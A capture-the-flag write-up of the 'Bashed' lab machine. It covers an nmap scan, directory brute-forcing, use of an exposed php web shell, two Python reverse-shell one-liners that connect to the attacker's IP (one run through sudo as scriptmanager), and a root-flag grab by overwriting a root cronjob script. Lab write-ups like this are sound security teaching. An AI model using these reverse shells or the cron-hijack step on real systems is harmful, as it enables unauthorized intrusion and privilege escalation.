Bashed is an easy Linux box that can be exploited by discovering a php web shell named ‘phpbash.php’ on the webserver. Privileges can be escalated with by exploiting a cronjob that is running as root.
Nmap discovered the following open ports and services:
nmap -sC -sV -oN fullscan -Pn 10.129.24.131 PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Arrexel's Development Site
The first thing I checked was the webserver. The user is presented with the following:
Checked the source code with
ctrl + u but found nothing relevant so I started a directory brute-force with the following command:
This gives the following results:
/images (Status: 301) /uploads (Status: 301) /php (Status: 301) /css (Status: 301) /dev (Status: 301) /js (Status: 301) /fonts (Status: 301) /server-status (Status: 403)
Each of these directories were bruteforced individually and it was found that the dev directory contains a directory indexing vulnerability. So, you can simply navigate to:
10.129.24.131/dev/ and see that there are two files. Both, are a webshell from where you can execute commands on the server.
To obtain a reverse shell the following payload was used from pentest monkey:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.33",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
This is a python reverse shell. This will open a shell for the
www-data user. By navigating to the home directory you will see a user named arrexel, which has the user.txt in it.
Next up is trying to escalate privileges to root. By checking
sudo -l the result was as follows:
$ sudo -l Matching Defaults entries for www-data on bashed: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User www-data may run the following commands on bashed: (scriptmanager : scriptmanager) NOPASSWD: ALL
The root directory contains a directory called scripts. However, this was only accessible by the user scriptmanager. For simplicity reasons, a new python reverse shell was executed FROM the scriptmanager user (because www-data can run commands as scriptmanager) like shown below:
sudo -u scriptmanager python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.33",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Notice the first part of this command which makes it execute it as the scriptmanager user. This will give you a reverse shell as scriptmanager. Now you can enter the scripts directory and you will find two files. One python file that is being run as a cronjob by root (notice the timestamp) and a text file with root permissions. At this point it is pretty obvious you can replace the
test.py file with something like this:
import os os.system("cat /root/root.txt > powned.txt")
After this you have to wait a minute and you will find a newly created text file powned.txt containing the root flag.